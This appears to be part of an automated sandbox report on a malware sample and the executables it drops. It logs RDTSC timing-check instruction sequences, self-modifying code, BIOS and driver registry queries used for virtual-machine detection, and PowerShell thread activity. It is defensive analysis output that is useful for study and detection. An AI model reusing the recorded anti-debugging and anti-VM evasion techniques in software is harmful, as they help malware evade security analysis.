                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B9B second address: 5630BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630BA1 second address: 5630BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46DEh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630C26 second address: 5630CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD358ED1103h 0x00000009 xor ax, C8BEh 0x0000000e jmp 00007FD358ED1109h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD358ED1100h 0x0000001a add eax, 2556F9B8h 0x00000020 jmp 00007FD358ED10FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007FD358ED1102h 0x00000032 pop eax 0x00000033 jmp 00007FD358ED10FBh 0x00000038 popad 0x00000039 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CCB second address: 5630CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CCF second address: 5630CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CD3 second address: 5630CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CD9 second address: 5630CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CDF second address: 5630D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov eax, 15AC31B5h 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD358DA46E3h 0x0000001b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12BF1B2 second address: 12BF1C7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD358ED10FEh 0x00000008 jng 00007FD358ED10F6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12BF1C7 second address: 12BF1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD358DA46D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FD358DA46D6h 0x00000016 jp 00007FD358DA46D6h 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C46E9 second address: 12C4708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FD358ED10FAh 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007FD358ED10FCh 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4B12 second address: 12C4B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4C8F second address: 12C4CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD358ED1107h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4CC6 second address: 12C4CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4CD1 second address: 12C4CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E44 second address: 12C4E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E4D second address: 12C4E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007FD358ED1106h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E72 second address: 12C4E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E7F second address: 12C4E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6802 second address: 12C680A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6921 second address: 12C6926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C697D second address: 12C69B1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD358DA46DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2664h], ecx 0x00000013 push 00000000h 0x00000015 xor dword ptr [ebp+122DBCE1h], ebx 0x0000001b call 00007FD358DA46D9h 0x00000020 push ecx 0x00000021 pushad 0x00000022 jnl 00007FD358DA46D6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C69B1 second address: 12C69FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jng 00007FD358ED10FEh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 jo 00007FD358ED10F6h 0x00000019 pop eax 0x0000001a pushad 0x0000001b jno 00007FD358ED10F6h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD358ED1109h 0x0000002f rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6AC8 second address: 12C6ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E0h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6ADC second address: 12C6B02 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD358ED1109h 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B02 second address: 12C6B0C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B0C second address: 12C6B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B2D second address: 12C6B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B34 second address: 12C6B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FD358ED10F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jg 00007FD358ED110Dh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FD358ED10F8h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B6F second address: 12C6B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E9h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B8C second address: 12C6BDC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov si, FBD1h 0x00000011 lea ebx, dword ptr [ebp+1245A6FBh] 0x00000017 jmp 00007FD358ED1103h 0x0000001c jno 00007FD358ED10FCh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 jp 00007FD358ED10F8h 0x0000002a je 00007FD358ED10F8h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6BDC second address: 12C6BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6BE0 second address: 12C6BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6C1F second address: 12C6C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6C23 second address: 12C6C61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FD358ED1102h 0x0000000d nop 0x0000000e mov si, cx 0x00000011 push 00000000h 0x00000013 sub dword ptr [ebp+122D288Fh], eax 0x00000019 push 2A71AFE0h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD358ED1101h 0x00000025 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60E8 second address: 12E60EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60EC second address: 12E60F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60F0 second address: 12E60F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60F8 second address: 12E60FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6266 second address: 12E6271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6271 second address: 12E6275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6275 second address: 12E62A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD358DA46E7h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 jo 00007FD358DA46D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6C75 second address: 12E6C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FD358ED10F6h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6E0D second address: 12E6E34 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD358DA46D6h 0x00000008 jc 00007FD358DA46D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FD358DA46DDh 0x00000015 popad 0x00000016 jo 00007FD358DA46EAh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6E34 second address: 12E6E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12ACCBA second address: 12ACCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7210 second address: 12E7215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E787A second address: 12E7885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7885 second address: 12E789F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push edx 0x00000007 jmp 00007FD358ED10FDh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E789F second address: 12E78A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7E38 second address: 12E7E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7E3E second address: 12E7E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EAC32 second address: 12EAC38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E99B9 second address: 12E99BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E99BE second address: 12E99C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E99C4 second address: 12E99C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB2CE second address: 12EB2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD358ED10FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD358ED1107h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EdYEXasNiR.exe Special instruction interceptor: First address: D28B7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EdYEXasNiR.exe Special instruction interceptor: First address: D28C41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EdYEXasNiR.exe Special instruction interceptor: First address: EF694A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EdYEXasNiR.exe Special instruction interceptor: First address: EDF4A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Special instruction interceptor: First address: 113FCA0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Special instruction interceptor: First address: 12EB130 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Special instruction interceptor: First address: 1314B36 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Special instruction interceptor: First address: 12F4C86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Special instruction interceptor: First address: 137473D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe Special instruction interceptor: First address: EDEA81 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe Special instruction interceptor: First address: EDE96D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe Special instruction interceptor: First address: 1081E52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe Special instruction interceptor: First address: 10AEC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FBEA81 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FBE96D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1161E52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 118EC18 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\HJEHIJEBKE.exe Special instruction interceptor: First address: 72EA81 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\HJEHIJEBKE.exe Special instruction interceptor: First address: 72E96D instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\HJEHIJEBKE.exe Special instruction interceptor: First address: 8D1E52 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\HJEHIJEBKE.exe Special instruction interceptor: First address: 8FEC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: C6EA81 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: C6E96D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: E11E52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: E3EC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Memory allocated: 1290000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Memory allocated: 2FE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Memory allocated: 2F20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe Code function: 5_2_054C0CA7 rdtsc 5_2_054C0CA7
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Thread delayed: delay time: 598111
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Thread delayed: delay time: 597950
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Thread delayed: delay time: 597794
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Thread delayed: delay time: 597388
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Thread delayed: delay time: 596942
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1156
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1120
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1116
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1109
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1125
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Window / User API: threadDelayed 2541
Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe Window / User API: threadDelayed 512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7383
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7410
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2285
Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe Window / User API: threadDelayed 619
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1223
